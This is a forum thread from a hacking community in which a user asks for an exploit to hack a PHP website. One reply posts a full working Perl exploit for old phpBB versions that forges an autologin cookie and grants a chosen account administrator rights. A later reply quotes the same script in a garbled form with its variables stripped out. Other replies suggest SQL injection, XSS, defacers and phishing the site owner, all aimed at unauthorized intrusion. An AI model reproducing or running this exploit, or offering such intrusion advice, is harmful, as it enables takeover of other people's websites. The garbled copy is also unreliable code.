Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Hacking › Exploits › An exploit to hack a php website?

ExclamationAn exploit to hack a php website?

Posts 1–12 of 12 · Page 1 of 1
BL
blackout385
An exploit to hack a php website?
hey does anyone have an exploit to hack a php website?
#1 · 17y ago
[D]evliin
[D]evliin
not a clue.
#2 · 17y ago
MA
marian_bosss
you are a lyar this adress is to your habamon not to exp[loits hack
#3 · 17y ago
Sjoerd
Sjoerd
#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB &bull; View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)

# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;


use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;

if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;

$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;

if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";

$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

# milw0rm.com [2005-03-21]
#4 · 17y ago
HA
hanamana
PHP is processed on server side and completely invisible on client side. near impossible to 'hack'
#5 · 17y ago
Gabbb
Gabbb
Try to use a defacer. I have used it when my friend gave me one but it's kinda hard to understand even i have a tutorial. The one who made that defacer hacked microsoft france site.
#6 · 17y ago
GG2GG
GG2GG
Quote Originally Posted by Sjla View Post
#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB &bull; View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)

# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;

my = ;
my = ;
my = ;
my = ;
my = "http://";
.= ;
.= ;


use HTTP::Cookies;
my = LWP::UserAgent->new ();
my = HTTP::Cookies->new( );
( );
( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",,,,,,);
if ( defined ) {
=~ s/(http://)//eg;
("http" , "http://");
}
print "++++++++++++++++++++++++++++++++++++n";
print "Trying to connect to "; if () {print "using proxy ";}

my = ();
die "Error: ",
unless ;

if( =~ m/phpbbprivmsg/) {
print "n Forum is vulnerable!!!n";
} else {
print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++nTrying to get the user: ID...n";
=~ /sid=([wd]*)/;
my = $1;

.= "admin/admin_ug_auth.php?mode=user&sid=";
= (
,
[
'username' => ,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ",
unless ;

if ( =~ /name="u" value="([d]*)"/)
{print " Done... ID=$1n++++++++++++++++++++++++++++++n";}
else {print "No user found..."; exit(); }
my = $1;
print "Trying to give user: admin status...n";

= (
,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> ,
'submit'=> 'Submit'
],
);
die "Error: ",
unless ;
print " Well done!!! should now have an admin status..n++++++++++++++++++++++++++++";

# milw0rm.com [2005-03-21]
way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.

to answer the question i would require a link to the site in question or informaiton about php scripts its running.

Quote Originally Posted by hanamana View Post
PHP is processed on server side and completely invisible on client side. near impossible to 'hack'

php is processed server sided but retrives information from the cilent, when dealing with hacking logins you use the language php, to communicate directly with mysql which holds the user and passwords, and either exploit and read from the mysql tables or by pass the login buy making the site belive you entered a vaild login.

in short find or create a exploit. insert the malicious php code ie retrive usernames or create users.
#7 · edited 17y ago · 17y ago
Chuck Norris
Chuck Norris
you can do packet editing at php right?
#8 · 17y ago
Toymaker
Toymaker
There is a lot of ways to manipulate information and hack web sites. Hell if you're clever enough, you could just phish the site owner's password haha. I've found some tricks and scripts that have all pretty much sent false information, or constructed, to their server to rip out important aspects.
#9 · 17y ago
GR
griminal
Look up SQL injection...
#10 · 17y ago
Sjoerd
Sjoerd
Quote Originally Posted by GG2GG View Post
way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.

to answer the question i would require a link to the site in question or informaiton about php scripts its running.
Lmao i do know how to use it :/
#11 · 17y ago
LA
Lanny
Learn how to XSS Script attack.
#12 · 17y ago
Posts 1–12 of 12 · Page 1 of 1

Post a Reply

Similar Threads

  • Selling hacking tool for websitesBy Joshcarr2006 in Trade Accounts/Keys/Items
    33Last post 17y ago
  • Selling Hack Pack Including Website Downers, Viruses and more!By GRAPH1C-SALES in Trade Accounts/Keys/Items
    3Last post 16y ago
  • Need help injecting a hack from this website!By papy1 in Combat Arms Help
    17Last post 15y ago
  • It supose to be free VIP hack on this websiteBy crysis278 in CrossFire Hacks & Cheats
    15Last post 16y ago

Tags for this Thread

#exploit#hack#php#website